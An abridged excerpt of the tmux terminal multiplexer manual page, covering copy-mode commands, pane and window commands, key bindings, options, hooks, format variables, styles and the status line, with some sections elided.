           bottom-line                                 L
           cancel                                      q         Escape
           clear-selection                             Escape    C-g
           copy-end-of-line [<prefix>]                 D         C-k
           copy-line [<prefix>]
           copy-pipe <command> [<prefix>]
           copy-pipe-no-clear <command> [<prefix>]
           copy-pipe-and-cancel <command> [<prefix>]
           copy-selection [<prefix>]
           copy-selection-no-clear [<prefix>]
           copy-selection-and-cancel [<prefix>]        Enter     M-w
           cursor-down                                 j         Down
           cursor-down-and-cancel
           next-matching-bracket                       %         M-C-f
           next-paragraph                              }         M-}
           next-space                                  W
           next-space-end                              E
           next-word                                   w
           next-word-end                               e         M-f
           other-end                                   o
           page-down                                   C-f       PageDown
           page-down-and-cancel
           page-up                                     C-b       PageUp
           previous-matching-bracket                   M-C-b
           previous-paragraph                          {         M-{
           previous-space                              B
           previous-word                               b         M-b
           rectangle-toggle                            v         R
           scroll-down                                 C-e       C-Down
           scroll-down-and-cancel
           scroll-up                                   C-y       C-Up
           search-again                                n         n
           search-backward <for>                       ?
           search-backward-incremental <for>                     C-r
           search-backward-text <for>
           search-forward <for>                        /
           search-forward-incremental <for>                      C-s
           search-forward-text <for>
           search-reverse                              N         N
           select-line                                 V
           select-word
           start-of-line                               0         C-a
           stop-selection
           top-line                                    H         M-R

     The search commands come in several varieties: `search-forward' and
     `search-backward' search for a regular expression; the `-text' variants
     search for a plain text string rather than a regular expression;
     `-incremental' perform an incremental search and expect to be used with
     the -i flag to the command-prompt command. `search-again' repeats the
     last search and `search-reverse' does the same but reverses the
     direction (forward becomes backward and backward becomes forward).

     Copy commands may take an optional buffer prefix argument which is used
     to generate the buffer name (the default is `buffer' so buffers are
     named `buffer0', `buffer1' and so on). Pipe commands take a command
     argument which is the command to which the copied text is piped. The
     `-and-cancel' variants of some commands exit copy mode after they have
     completed (for copy commands) or when the cursor reaches the bottom
     (for scrolling commands). `-no-clear' variants do not clear the
     selection.

     copy-mode [-eHMqu] [-t target-pane]
           Enter copy mode. The -u option scrolls one page up. -M begins a
           mouse drag (only valid if bound to a mouse key binding, see MOUSE
           SUPPORT). -H hides the position indicator in the top right. -q
           cancels copy mode and any other modes.

     A number of preset arrangements of panes are available, these are
     called layouts.

     [-b] [-n window-name] [-s src-pane] [-t dst-window]

     ... exists, an error will be returned unless -q is given. If -e is
     given, the output includes escape sequences for text and background
     attributes. -C also escapes non-printable characters as octal \xxx. -N
     preserves trailing spaces at each line's end and -J preserves trailing
     spaces and joins any wrapped lines.
           r       Reverse sort order
           v       Toggle preview
           q       Exit mode

     After a client is chosen, `%%' is replaced by the client name in
     template and the result executed as a command. If template is not
     given, "detach-client -t '%%'" is used.

     -O specifies the initial sort field: one of `name', `size', `creation',
     or `activity'. -r reverses the sort order. -f specifies an initial
     filter: the filter is a format - if it evaluates to zero, the item in
     the list is not shown, otherwise it is shown. If a filter would lead to
     an empty list, it is ignored. -F specifies the format for each item in
     the list. -N starts without the preview. This command works only if at
     least one client is attached.

     choose-tree [-GNrswZ] [-F format] [-f filter] [-O sort-order]
           [-t target-pane] [template]
           Put a pane into tree mode, where a session, window or pane may be
           chosen interactively from a list. -s starts with sessions
           collapsed and -w with windows collapsed. -Z zooms the pane. The
           following keys may be used in tree mode:

                 Key     Function
                 Enter   Choose selected item
                 Up      Select previous item
                 Down    Select next item
                 x       Kill selected item
                 X       Kill tagged items
                 r       Reverse sort order
                 v       Toggle preview
                 q       Exit mode

           After a session, window or pane is chosen, `%%' is replaced by
           the target in template and the result executed as a command. If
           template is not given, "switch-client -t '%%'" is used.

           -O specifies the initial sort field: one of `index', `name', or
           `time'. -N starts without the preview. -G includes all sessions
           in any session groups in the tree rather than only the first.
           This command works only if at least one client is attached.

     display-panes [-b] [-d duration] [-t target-client] [template]
           (alias: displayp)
           Display a visible indicator of each pane shown by target-client.
           See the display-panes-colour and display-panes-active-colour
           session options. The indicator is closed when a key is pressed or
           duration milliseconds have passed. If -d is not given,
           display-panes-time is used.
           A duration of zero means the indicator stays until a key is
           pressed. While the indicator is on screen, a pane may be chosen
           with the `0' to `9' keys, which will cause template to be
           executed as a command with `%%' substituted by the pane ID. The
           default template is "select-pane -t '%%'". With -b, other
           commands are not blocked from running until the indicator is
           closed.

     find-window [-rCNTZ] [-t target-pane] match-string
           (alias: findw)
           Search for a fnmatch(3) pattern or, with -r, regular expression
           match-string in window names, titles, and visible content (but
           not history). The flags control matching behavior: -C matches
           only visible window contents, -N matches only the window name and
           -T matches only the window title. The default is -CNT. -Z zooms
           the pane. This command works only if at least one client is
           attached.

     join-pane [-bdfhv] [-l size] ...

     last-pane [-Z] [-t target-window]
           (alias: lastp)
           Select the last (previously selected) pane. -Z keeps the window
           zoomed if it was zoomed.

     -e takes the form `VARIABLE=value' and sets an environment variable for
     the newly created window; it may be specified multiple times.

     The TERM environment variable must be set to `screen' or `tmux' for all
     programs running inside tmux. New windows will automatically have
     `TERM=screen' added to their environment, but care must be taken not to
     reset this in shell start-up files or by the -e option.

     pipe-pane [-IOo] [-t target-pane] [shell-command]
           (alias: pipep)
           Pipe output sent by the program in target-pane to a shell command
           or vice versa. A pane may only be connected to one command at a
           time, any existing pipe is closed before shell-command is
           executed. The shell-command string may contain the special
           character ...

     ... columns (the default is 1); -x and -y may be given as a number of
     lines or columns or followed by `%' for a percentage of the window size
     (for example `-x 10%').
     With -Z, the active pane is toggled between zoomed (occupying the whole
     of the window) and unzoomed (its normal position in the layout). -M
     begins mouse resizing (only valid if bound to a mouse key binding, see
     MOUSE SUPPORT).

     resize-window [-aADLRU] [-t target-window] [-x width] [-y height]
           [adjustment]
           (alias: resizew)
           Resize a window, up, down, left or right by adjustment with -U,
           -D, -L or -R, or to an absolute size with -x or -y. The
           adjustment is given in lines or cells (the default is 1). -A sets
           the size of the largest session containing the window; -a the
           size of the smallest. This command will automatically set
           window-size to manual in the window options.

     respawn-pane [-k] [-c start-directory] [-e environment] ...
           -c specifies a new working directory for the pane. The -e option
           has the same meaning as for the new-window command.

     respawn-window [-k] [-c start-directory] [-e environment] ...
           -c specifies a new working directory for the window. The -e
           option has the same meaning as for the new-window command.

     rotate-window [-DUZ] [-t target-window]
           (alias: rotatew)
           Rotate the positions of the panes within a window, either upward
           (numerically lower) with -U or downward (numerically higher). -Z
           keeps the window zoomed if it was zoomed.

     select-layout [-Enop] [-t target-pane] ...
           -E spreads the current pane and any panes next to it out evenly.

     select-pane [-DdeLlMmRUZ] [-T title] [-t target-pane]
           (alias: selectp)
           Make pane target-pane the active pane in window target-window. If
           one of -D, -L, -R, or -U is used, respectively the pane below, to
           the left, to the right, or above the target pane is used. -Z
           keeps the window zoomed if it was zoomed. -l is the same as using
           the last-pane command. -e enables or -d disables input to the
           pane. -T sets the pane title.

           -m and -M are used to set and clear the marked pane. There is one
           marked pane at a time, setting a new marked pane clears the last.
           The marked pane is the default target for -s to join-pane,
           swap-pane and swap-window.

     split-window [-bdfhIvP] [-c start-directory] [-e environment] [-l size]
           [-t target-pane] [shell-command] [-F format]
           (alias: splitw)
           Create a new pane by splitting target-pane: -h does a horizontal
           split and -v a vertical split; if neither is specified, -v is
           assumed. The -l option specifies the size of the new pane in
           lines (for vertical split) or in columns (for horizontal split);
           size may be followed by `%' to specify a percentage of the
           available space. The -b option causes the new pane to be created
           to the left of or above target-pane. The -f option creates a new
           pane spanning the full window height (with -h) or full window
           width (with -v), instead of splitting the active pane.

           An empty shell-command ('') will create a pane with no command
           running in it. Output can be sent to such a pane with the
           display-message command. The -I flag (if shell-command is not
           specified or empty) will create an empty pane and forward any
           output from stdin to it. For example:

                 $ make 2>&1|tmux splitw -dI &

           All other options have the same meaning as for the new-window
           command.

     swap-pane [-dDUZ] ...
           -Z keeps the window zoomed if it was zoomed. If -d is given, the
           new window does not become the current window.

     A command bound to the Any key will execute for all keys which do not
     have a more specific binding.

     Commands related to key bindings are as follows:

     bind-key [-nr] [-N note] [-T key-table] key command [arguments]
           (alias: bind)
           Bind key key to command. Keys are bound in a key table. By
           default (without -T), the key is bound in the prefix key table.
           This table is used for keys pressed after the prefix key (for
           example, by default `c' is bound to new-window in the prefix
           table). Keys may also be bound in custom key tables and the
           switch-client -T command used to switch to them from a key
           binding.

           The -r flag indicates this key may repeat, see the repeat-time
           option. -N attaches a note to the key (shown with list-keys -N).
     To view the default bindings and possible commands, see the list-keys
     command.

     list-keys [-1aN] [-P prefix-string] [-T key-table] [key]
           (alias: lsk)
           List key bindings. There are two forms: the default lists keys as
           bind-key commands; -N lists only keys with attached notes and
           shows only the key and note for each key.

           With the default form, all key tables are listed by default. -T
           lists only keys in key-table.

           With the -N form, only keys in the root and prefix key tables are
           listed by default; -T also lists only keys in key-table. -P
           specifies a prefix to print before each key and -1 lists only the
           first matching key. -a lists the command for keys that do have a
           note rather than skipping them.

     send-keys [-FHlMRX] [-N repeat-count] ...
           The -l flag disables key name lookup and processes the keys as
           literal UTF-8 characters. The -H flag expects each key to be a
           hexadecimal number for an ASCII character. -F expands formats in
           arguments where appropriate.

OPTIONS
     The appearance and behaviour of tmux may be modified by changing the
     value of various options. There are four types of option: server
     options, session options, window options and pane options.

     The tmux server has a set of global server options which do not apply
     to any particular window or session or pane. ... Each pane has a set of
     pane options. Pane options inherit from window options. This means any
     pane option may be set as a window option to apply the option to all
     panes in the window without the option set; this can be used, for
     example, to set the background colour.

     tmux also supports user options which are prefixed with a `@'. User
     options may have any name, so long as they are prefixed with `@', and
     be set to any string. For example:

           $ tmux setw -q @foo "abc123"
           $ tmux showw -v @foo
           abc123

     Commands which set options are as follows:

     set-option [-aFgopqsuw] [-t target-pane] option value
           (alias: set)
           Set a pane option with -p, a window option with -w, a server
           option with -s, otherwise a session option.
           If the option is not a user option, -w or -s may be unnecessary -
           tmux will infer the type from the option name, assuming -w for
           pane options. If -g is given, the global session or window option
           is set. -F expands formats in the option value.

     show-options [-AgHpqsvw] [-t target-pane] [option]
           (alias: show)
           Show the pane options (or a single option if option is provided)
           with -p, the window options with -w, the server options with -s,
           otherwise the session options. If the option is not a user
           option, -w or -s may be unnecessary - tmux will infer the type
           from the option name, assuming -w for pane options. Global
           session or window options are listed if -g is used. -v shows only
           the option value, not the name. If -q is set, no error will be
           returned if option is unset. -H includes hooks (omitted by
           default). -A includes options inherited from a parent set of
           options, such options are marked with an asterisk.

     value depends on the option and may be a number, a string, or a flag
     (on, off, or omitted to toggle).

     Available server options are:

     backspace key
           Set the key sent by tmux for backspace.

     buffer-limit number
           Set the number of buffers; as new buffers are added to the top of
           the stack, old ones are removed from the bottom if necessary to
           maintain this maximum length.

     command-alias[] name=value
           This is an array of custom aliases for commands. If an unknown
           command ...

     ... must be set to `screen', `tmux' or a derivative of them.

     ... history on exit and load it from on start.

     message-limit number
           Set the number of error or information messages to save in the
           message log for each client. The default is 100.

     set-clipboard [on | external | off]
           Attempt to set the terminal clipboard content using the xterm(1)
           escape sequence, if there is an Ms entry in the terminfo(5)
           description ...

     terminal-overrides[] string
           ... allows terminfo(5) entries to be overridden. Each entry is a
           colon-separated string made up of a terminal type pattern
           (matched using fnmatch(3)) and a set of name=value entries.
           For example, to set the `clear' terminfo(5) entry to `\e[H\e[2J'
           for all terminal types matching `rxvt*':

                 rxvt*:clear=\e[H\e[2J

           The terminal entry value is passed through strunvis(3) before
           interpretation.

     user-keys[] key
           Set list of user-defined key escape sequences. Each item is
           associated with a key named `User0', `User1', and so on. For
           example:

                 set -s user-keys[0] "\e[5;30012~"
                 bind User0 resize-pane -L 3

     ... bindings are not processed. The default is one millisecond and zero
     disables.

     base-index index
           Set the base index from which an unused index should be searched
           when a new window is created. The default is zero.

     bell-action [any | none | current | other]
           Set action on a bell in a window when monitor-bell is on. The
           values are the same as those for activity-action.

     default-command shell-command
           Set the command used for new windows (if not specified when the
           window is created) to shell-command, which may be any sh(1)
           command.

     ... the SHELL environment variable, the shell returned by getpwuid(3),
     or /bin/sh. This option should be configured when tmux is used as a
     login shell.

     default-size XxY
           Set the default size of new windows when the window-size option
           is set to manual or when a session is created with new-session
           -d. The value is the width and height separated by an `x'
           character. The default is 80x24.

     ... milliseconds.

     history-limit lines
           Set the maximum number of lines held in window history. This
           setting applies only to new windows - existing window histories
           are not resized and retain the limit at the point they were
           created.

     ... For how to specify style, see the STYLES section.

     message-style style
           Set status line message style. For how to specify style, see the
           STYLES section.

     mouse [on | off]
           If on, tmux captures the mouse and allows mouse events to be
           bound as key bindings. See the MOUSE SUPPORT section for details.

     prefix key
           Set the key accepted as a prefix key.
     In addition to the standard ...

     renumber-windows [on | off]
           If on, automatically renumber the other windows in numerical
           order. This respects the base-index option if it has been set. If
           off, do not renumber the windows.

     repeat-time time
           Allow multiple commands to be entered without pressing the
           prefix-key again in the specified time milliseconds (the default
           is 500). Whether a key repeats may be set when it is bound using
           the -r flag to bind-key. Repeat is enabled for the default keys
           bound to the resize-pane command.

     ... the client terminal title if set-titles is on. Formats are
     expanded, see the FORMATS section.

     silence-action [any | none | current | other]
           Set action on window silence when monitor-silence is on. The
           values are the same as those for activity-action.

     status [off | on | 2 | 3 | 4 | 5]
           Show or hide the status line or specify its size. Using on gives
           a status line one row in height; 2, 3, 4 or 5 more rows.

     status-format[] format
           Specify the format to be used for each line of the status line.
           The default builds the top status line from the various
           individual status options below.

     status-interval interval
           Update the status line every interval seconds. ...

     status-keys [vi | emacs]
           Use vi or emacs-style key bindings in the status line, for
           example at the command prompt. The default is emacs, unless the
           VISUAL or EDITOR environment variables are set and contain the
           string `vi'.

     status-left string
           Display string (by default the session name) to the left of the
           status line. string will be passed through strftime(3). Also see
           the FORMATS and STYLES sections.

     ... of the status line. The default is 10.

     status-left-style style
           Set the style of the left part of the status line. For how to
           specify style, see the STYLES section.

     ... STYLES section.

     status-style style
           Set status line style. For how to specify style, see the STYLES
           section.

     update-environment[] variable
           Set list of environment variables to be copied into the session
           environment when a new session is created or an existing session
           is attached.
Any variables that do not exist in the source environment are set to be removed from the session environment (as if -r was given to the set-environment command).

word-separators string
      Sets the session's conception of what characters are considered word separators, for the purposes of the next and previous word commands in copy mode. The default is ` -_@'.

Available window options are:

aggressive-resize [on | off]
      Aggressively resize the chosen window. This means that tmux will resize the window to the size of the smallest or largest session (see the window-size option) for which it is the current window, rather than the session to which it is attached. The window may resize when the current window is changed on another session; this option is good for full-screen programs which support SIGWINCH and poor for interactive programs such as shells.

automatic-rename [on | off]
      Control automatic window renaming. When this setting is enabled, tmux will rename the window automatically using the format specified by automatic-rename-format. This flag is automatically disabled for an individual window when a name is specified at creation with new-window or new-session, or later with rename-window, or with a terminal escape sequence. It may be switched off globally with:

            set-option -wg automatic-rename off

automatic-rename-format format
      The format (see FORMATS) used when the automatic-rename option is enabled.

clock-mode-colour colour
      Set clock colour.

clock-mode-style [12 | 24]
      Set clock hour format.

main-pane-height height
main-pane-width width
      Set the width or height of the main (left or top) pane in the main-horizontal or main-vertical layouts.

mode-keys [vi | emacs]
      Use vi or emacs-style key bindings in copy mode. The default is emacs, unless VISUAL or EDITOR contains `vi'.

mode-style style
      Set window modes style. For how to specify style, see the STYLES section.

monitor-activity [on | off]
      Monitor for activity in the window. Windows with activity are highlighted in the status line.

monitor-bell [on | off]
      Monitor for a bell in the window. Windows with a bell are highlighted in the status line.

pane-active-border-style style
      Set the pane border style for the currently active pane. For how to specify style, see the STYLES section. Attributes are ignored.
pane-base-index index
      Like base-index, but set the starting index for pane numbers.

pane-border-style style
      Set the pane border style for panes aside from the active pane. For how to specify style, see the STYLES section. Attributes are ignored.

synchronize-panes [on | off]
      Duplicate input to any pane to all other panes in the same window (only for panes that are not in any special mode).

window-status-activity-style style
      Set status line style for windows with an activity alert. For how to specify style, see the STYLES section.

window-status-bell-style style
      Set status line style for windows with a bell alert. For how to specify style, see the STYLES section.

window-status-current-format string
      Like window-status-format, but is the format used when the window is the current window.

window-status-current-style style
      Set status line style for the currently active window. For how to specify style, see the STYLES section.

window-status-format string
      Set the format in which the window is displayed in the status line window list. See the FORMATS and STYLES sections.

window-status-last-style style
      Set status line style for the last active window. For how to specify style, see the STYLES section.

window-status-separator string
      Sets the separator drawn between windows in the status line. The default is a single space character.

window-status-style style
      Set status line style for a single window. For how to specify style, see the STYLES section.

window-size largest | smallest | manual | latest
      Configure how tmux determines the window size. If set to largest, the size of the largest attached session is used; if smallest, the size of the smallest. If manual, the size of a new window is set from the default-size option and windows are resized automatically. With latest, tmux uses the size of the client that had the most recent activity. See also the resize-window command and the aggressive-resize option.

wrap-search [on | off]
      If this option is set, searches will wrap around the end of the pane contents. The default is on.
xterm-keys [on | off]
      If this option is set, tmux will generate xterm(1) -style function key sequences; these have a number included to indicate modifiers such as Shift, Alt or Ctrl.

Available pane options are:

allow-rename [on | off]
      Allow programs in the pane to change the window name using a terminal escape sequence (\ek...\e\\).

alternate-screen [on | off]
      This option configures whether programs running inside the pane may use the terminal alternate screen feature, which allows the smcup and rmcup terminfo(5) capabilities.

remain-on-exit [on | off]
      A pane with this flag set is not destroyed when the program running in it exits. The pane may be reactivated with the respawn-pane command.

window-active-style style
      Set the pane style when it is the active pane. For how to specify style, see the STYLES section.

window-style style
      Set the pane style. For how to specify style, see the STYLES section.

HOOKS
tmux allows commands to run on various triggers, called hooks. Most tmux commands have an after hook and there are a number of hooks not associated with commands. Hooks are stored as array options, members of the array are executed in order when the hook is triggered. Hooks may be configured with the set-hook or set-option commands and displayed with show-hooks or show-options -H. The following two commands are equivalent:

      set-hook -g pane-mode-changed[42] 'set -g status-left-style bg=red'
      set-option -g pane-mode-changed[42] 'set -g status-left-style bg=red'

Setting a hook without specifying an array index clears the hook and sets the first member of the array. A command's after hook is run after it completes, except when the command is run as part of a hook itself. They are named with an `after-' prefix. For example, the following command adds a hook to select the even-vertical layout after every split-window:

      set-hook -g after-split-window "selectl even-vertical"

All the notifications listed in the CONTROL MODE section are hooks (without arguments). The following hooks are also available:

pane-focus-in
      Run when the focus enters a pane, if the focus-events option is on.
pane-focus-out
      Run when the focus exits a pane, if the focus-events option is on.

set-hook [-agRu] [-t target-session] hook-name command
      Without -R, sets (or with -u unsets) hook hook-name to command. If -g is given, hook-name is added to the global list of hooks, otherwise it is added to the session hooks (for target-session with -t). -a appends to a hook. Like options, session hooks inherit from the global ones. With -R, run hook-name immediately.

MOUSE SUPPORT
Each mouse key binding is suffixed with a location, one of the following:

      Pane           the contents of a pane
      Border         a pane border
      Status         the status line window list
      StatusLeft     the left part of the status line
      StatusRight    the right part of the status line
      StatusDefault  any other part

FORMATS
Certain commands accept the -F flag with a format argument. This is a string which controls the output format of the command. Format variables are enclosed in `#{' and `}', for example `#{session_name}'. The possible variables are listed in the table below, or the name of a tmux option may be used for an option's value. Some variables have a shorter alias such as `#S'; `##' is replaced by a single `#', `#,' by a `,' and `#}' by a `}'.

Conditionals are available by prefixing with `?' and separating two alternatives with a comma; if the specified variable exists and is not zero, the first alternative is chosen, otherwise the second is used. For example, `#{?automatic-rename,yes,no}' will include `yes' if automatic-rename is enabled, or `no' if not. Conditionals can be nested arbitrarily. Inside a conditional, `,' and `}' must be escaped as `#,' and `#}', unless they are part of a `#{...}' replacement. For example:

      #{?pane_in_mode,#[fg=white#,bg=red],#[fg=red#,bg=white]}#W

String comparisons may be expressed by prefixing two comma-separated alternatives by `==', `!=', `<', `>', `<=' or `>=' and a colon. For example `#{==:#{host},myhost}' will be replaced by `1' if running on `myhost', otherwise by `0'. `||' and `&&' evaluate to true if either or both of two comma-separated alternatives are true, for example `#{||:#{pane_in_mode},#{alternate_on}}'.

An `m' specifies an fnmatch(3) or regular expression comparison. The first argument is the pattern and the second the string to compare. An optional third argument specifies flags: `r' means the pattern is a regular expression instead of the default fnmatch(3) pattern, and `i' means to ignore case.
For example: `#{m:*foo*,#{host}}' or `#{m/ri:^A,MYVAR}'.

A `C' performs a search for an fnmatch(3) pattern or regular expression in the pane content and evaluates to zero if not found, or a line number if found. Like `m', an `r' flag means search for a regular expression and `i' ignores case. For example: `#{C/r:^Start}'

A limit may be placed on the length of the resultant string by prefixing it by an `=', a number and a colon. Positive numbers count from the start of the string and negative from the end, so `#{=5:pane_title}' will include at most the first five characters of the pane title, or `#{=-5:pane_title}' the last five characters. A suffix or prefix may be given as a second argument - if provided then it is appended or prepended to the string if the length has been trimmed, for example `#{=/5/...:pane_title}' will append `...' if the pane title is more than five characters. Similarly, `p' pads the string to a given width, for example `#{p10:pane_title}' will result in a width of at least 10 characters. A positive width pads on the left, a negative on the right.

`q:' will escape sh(1) special characters. `E:' will expand the format twice, for example `#{E:status-left}' is the result of expanding the content of the status-left option rather than the option itself. `T:' is like `E:' but also expands strftime(3) specifiers. `S:', `W:' or `P:' will loop over each session, window or pane and insert the format once for each. For windows and panes, two comma-separated formats may be given: the second is used for the current window or active pane. For example, to get a list of windows formatted like the status line:

      #{W:#{E:window-status-format} ,#{E:window-status-current-format} }

A prefix of the form `s/foo/bar/:' will substitute `foo' with `bar' throughout. The first argument may be an extended regular expression and a final argument may be `i' to ignore case, for example `s/a(.)/\1x/i:' would change `abABab' into `bxBxbx'.

In addition, the last line of a shell command's output may be inserted using `#()'.
If the command hasn't exited, the most recent line of output will be used, but the status line will not be updated more than once a second. Commands are executed with the tmux global environment set (see the GLOBAL AND SESSION ENVIRONMENT section).

An `l' specifies that a string should be interpreted literally and not expanded. For example `#{l:#{?pane_in_mode,yes,no}}' will be replaced by `#{?pane_in_mode,yes,no}'.

The following variables are available, where appropriate: Variable name Alias Replaced with alternate_on 1 if pane is in alternate screen client_cell_height Height of each client cell in pixels client_cell_width Width of each client cell in pixels client_control_mode 1 if client is in control mode client_created Time client created client_discarded Bytes discarded when client behind client_height Height of client client_key_table Current key table client_last_session Name of the client's last session client_name Name of client client_width Width of client client_written Bytes written to client command Name of command in use, if any command_list_alias Command alias if listing commands command_list_name Command name if listing commands command_list_usage Command usage if listing commands copy_cursor_line Line the cursor is on in copy mode copy_cursor_word Word under cursor in copy mode copy_cursor_x Cursor X position in copy mode copy_cursor_y Cursor Y position in copy mode cursor_character Character at cursor in pane host #H Hostname of local host host_short #h Hostname of local host (no domain name) insert_flag Pane insert flag keypad_cursor_flag Pane keypad cursor flag keypad_flag Pane keypad flag line Line number in the list mouse_all_flag Pane mouse all flag mouse_any_flag Pane mouse any flag mouse_button_flag Pane mouse button flag mouse_line Line under mouse, if any mouse_sgr_flag Pane mouse SGR flag mouse_standard_flag Pane mouse standard flag mouse_utf8_flag Pane mouse UTF-8 flag mouse_word Word under mouse, if any mouse_x Mouse X position, if any mouse_y Mouse Y position, if any
origin_flag Pane origin pane_height Height of pane pane_id #D Unique pane ID pane_in_mode 1 if pane is in a mode pane_index #P Index of pane pane_input_off 1 if input to pane is disabled pane_left Left of pane pane_marked 1 if this is the marked pane pane_marked_set 1 if a marked pane is set pane_mode Name of pane mode, if any pane_path #T Path of pane (can be set by application) pane_pid PID of first process in pane pane_pipe 1 if pane is being piped pane_right Right of pane pane_search_string Last search string in copy mode pane_start_command Command pane started with pane_synchronized 1 if pane is synchronized pane_tabs Pane tab positions pane_title #T Title of pane (can be set by application) pane_top Top of pane pane_tty Pseudo terminal of pane pane_width Width of pane pid Server PID rectangle_toggle 1 if rectangle selection is activated scroll_position Scroll position in copy mode scroll_region_lower Bottom of scroll region in pane scroll_region_upper Top of scroll region in pane selection_active 1 if selection started and changes with the cursor in copy mode selection_end_x X position of the end of the selection selection_end_y Y position of the end of the selection selection_present 1 if selection started in copy mode selection_start_x X position of the start of the selection selection_start_y Y position of the start of the selection session_activity Time of session last activity session_alerts List of window indexes with alerts session_attached Number of clients session is attached to session_attached_list List of clients session is attached to session_created Time session created session_format 1 if format is for a session session_group Name of session group session_group_attached Number of clients sessions in group are attached to session_group_attached_list List of clients sessions in group are attached to session_group_list List of sessions in group session_group_many_attached 1 if multiple clients attached to sessions in group session_group_size Size 
of session group session_grouped 1 if session in a group session_id Unique session ID session_last_attached Time session last attached session_many_attached 1 if multiple clients attached session_name #S Name of session session_stack Window indexes in most recent order session_windows Number of windows in session socket_path Server socket path start_time Server start time version Server version window_active 1 if window active window_active_clients Number of clients viewing this window window_active_clients_list List of clients viewing this window window_active_sessions Number of sessions on which this window is active window_active_sessions_list List of sessions on which this window is active window_activity Time of window last activity window_activity_flag 1 if window has activity window_bell_flag 1 if window has bell window_bigger 1 if window is larger than client window_cell_height Height of each cell in pixels window_cell_width Width of each cell in pixels window_end_flag 1 if window has the highest index window_flags #F Window flags window_format 1 if format is for a window window_height Height of window window_id Unique window ID window_index #I Index of window window_last_flag 1 if window is the last used window_layout Window layout description, ignoring zoomed window panes window_linked 1 if window is linked across sessions window_linked_sessions Number of sessions this window is linked to window_linked_sessions_list List of sessions this window is linked to window_marked_flag 1 if window contains the marked pane window_name #W Name of window window_offset_x X offset into window if larger than client window_offset_y Y offset into window if larger than client window_panes Number of panes in window window_silence_flag 1 if window has silence alert window_stack_index Index in session most recent stack window_start_flag 1 if window has the lowest index window_visible_layout Window layout description, respecting zoomed window panes window_width Width of window 
window_zoomed_flag 1 if window is zoomed wrap_flag Pane wrap flag STYLES tmux offers various options to specify the colour and attributes of aspects of the interface, for example status-style for the status line. In addition, embedded styles may be specified in format options, such as status-left, by enclosing them in `#[' and `]'. A style may be the single term `default' to specify the default style (which may come from an option, for example status-style in the status line) or a space or comma separated list of the following: fg=colour Set the foreground colour. The colour is one of: black, red, green, yellow, blue, magenta, cyan, white; if supported the bright variants brightred, brightgreen, brightyellow; colour0 to colour255 from the 256-colour set; default for the default colour; terminal for the terminal default colour; or a hexadeci- mal RGB string such as `#ffffff'. bg=colour Set the background colour. none Set no attributes (turn off any active attributes). bright (or bold), dim, underscore, blink, reverse, hidden, italics, overline, strikethrough, double-underscore, curly-underscore, dotted-underscore, dashed-underscore Set an attribute. Any of the attributes may be prefixed with `no' to unset. align=left (or noalign), align=centre, align=right Align text to the left, centre or right of the available space if appropriate. fill=colour Fill the available space with a background colour if appropriate. list=on, list=focus, list=left-marker, list=right-marker, nolist Mark the position of the various window list components in the status-format option: list=on marks the start of the list; list=focus is the part of the list that should be kept in focus if the entire list won't fit in the available space (typically the current window); list=left-marker and list=right-marker mark the text to be used to mark that text has been trimmed from the left or right of the list if there is not enough space. 
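For example, the styles described above might be applied to the status line options with a configuration fragment such as the following (illustrative only, not taken from this page):

      set-option -g status-style bg=black,fg=white
      set-option -g window-status-current-style fg=black,bg=yellow,bold

The first command styles the whole status line; the second overrides the style for the current window's entry in the window list.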
push-default, pop-default
      Store the current colours and attributes as the default or reset to the previous default. A push-default affects any subsequent use of the default term until a pop-default. Only one default may be pushed (each push-default replaces the previous saved default).

range=left, range=right, range=window|X, norange
      Mark a range in the status-format option. range=left and range=right are the text used for the `StatusLeft' and `StatusRight' mouse keys. range=window|X is the range for a window passed to the `Status' mouse key, where `X' is a window index.

Examples are:

      fg=yellow bold underscore blink
      bg=black,fg=default,noreverse

NAMES AND TITLES
A pane's title can be set using an escape sequence (like it would set the xterm(1) window title in X(7)). tmux will update the pane title (if the allow-rename option is turned on) using the title setting escape sequence, for example:

      $ printf '\033]2;My Title\033\\'

It can also be modified with the select-pane -T command.

STATUS LINE
The status line is one line in height (it may be disabled or made multiple lines with the status session option) and contains, from left-to-right: the name of the current session in square brackets; the window list; the title of the active pane in double quotes; and the time and date. Each line of the status line is configured with the status-format option. In the window list, a `#' flag means window activity is monitored and activity has been detected, and a `!' flag means window bells are monitored and a bell has occurred in the window. The colour and attributes of the status line may be configured.

command-prompt [-1ikN] [-I inputs] [-p prompts] [-t target-client] [template]
      Before the command is executed, the first occurrence of the string `%%' and all occurrences of `%1' are replaced by the response to the first prompt, all `%2' are replaced with the response to the second prompt, and so on for further prompts. Up to nine prompt responses may be replaced (`%1' to `%9'). `%%%' is like `%%' but any quotation marks are escaped. -1 makes the prompt only accept one key press, in this case the resulting input is a single character.
-k is like -1 but the key press is translated to a key name. -N makes the prompt only accept numeric key presses. -i executes the command every time the prompt input changes instead of when the user exits the command prompt.

The following keys have a special meaning in the command prompt, depending on the value of the status-keys option:

      Function                        vi       emacs
      Cancel command prompt           Escape   Escape
      Delete from cursor to start of

display-menu [-c target-client] [-t target-pane] [-T title] [-x position] [-y position] name key command ... (alias: menu)
      Display a menu on target-client. name, key and command are formats, see the FORMATS and STYLES sections. If the name begins with a hyphen (-), then the item is disabled (shown dim) and may not be chosen. The name may be empty for a separator line, in which case both the key and command should be omitted. -T is a format for the menu title (see FORMATS). -x and -y give the position of the menu. Both may be a row or column number, or one of the following special values:

      Value  Flag  Meaning
      R      -x    The right side of the terminal
      P      Both  The bottom left of the pane
      M      Both  The mouse position
      W      -x    The window position on the status line
      S      -y    The line above or below the status line

      Each menu consists of items followed by a key shortcut shown in brackets. If the menu is too large to fit on the terminal, it is not displayed. Pressing the key shortcut chooses the corresponding item. If the mouse is enabled and the menu is opened from a mouse key binding, releasing the mouse button with an item selected will choose that item. The following keys are also available:

      Key    Function
      Enter  Choose selected item
      Up     Select previous item
      Down   Select next item
      q      Exit menu

display-message [-aIpv] [-c target-client] [-t target-pane] [message] (alias: display)
      Display a message. -v prints verbose logging as the format is parsed and -a lists the format variables and their values.
-I forwards any input read from stdin to the empty pane given by target-pane.

choose-buffer [-NZr] [-F format] [-f filter] [-O sort-order] [-t target-pane] [template]
      Put a pane into buffer mode, where a buffer may be chosen interactively. The following keys may be used in buffer mode:

      Key  Function
      O    Change sort field
      r    Reverse sort order
      v    Toggle preview
      q    Exit mode

      After a buffer is chosen, `%%' is replaced by the buffer name in template and the result executed as a command. If template is not given, "paste-buffer -b '%%'" is used. -O specifies the initial sort field: one of `time', `name' or `size'. -F specifies the format for each item in the list. -N starts without the preview. This command works only if at least one client is attached.

paste-buffer
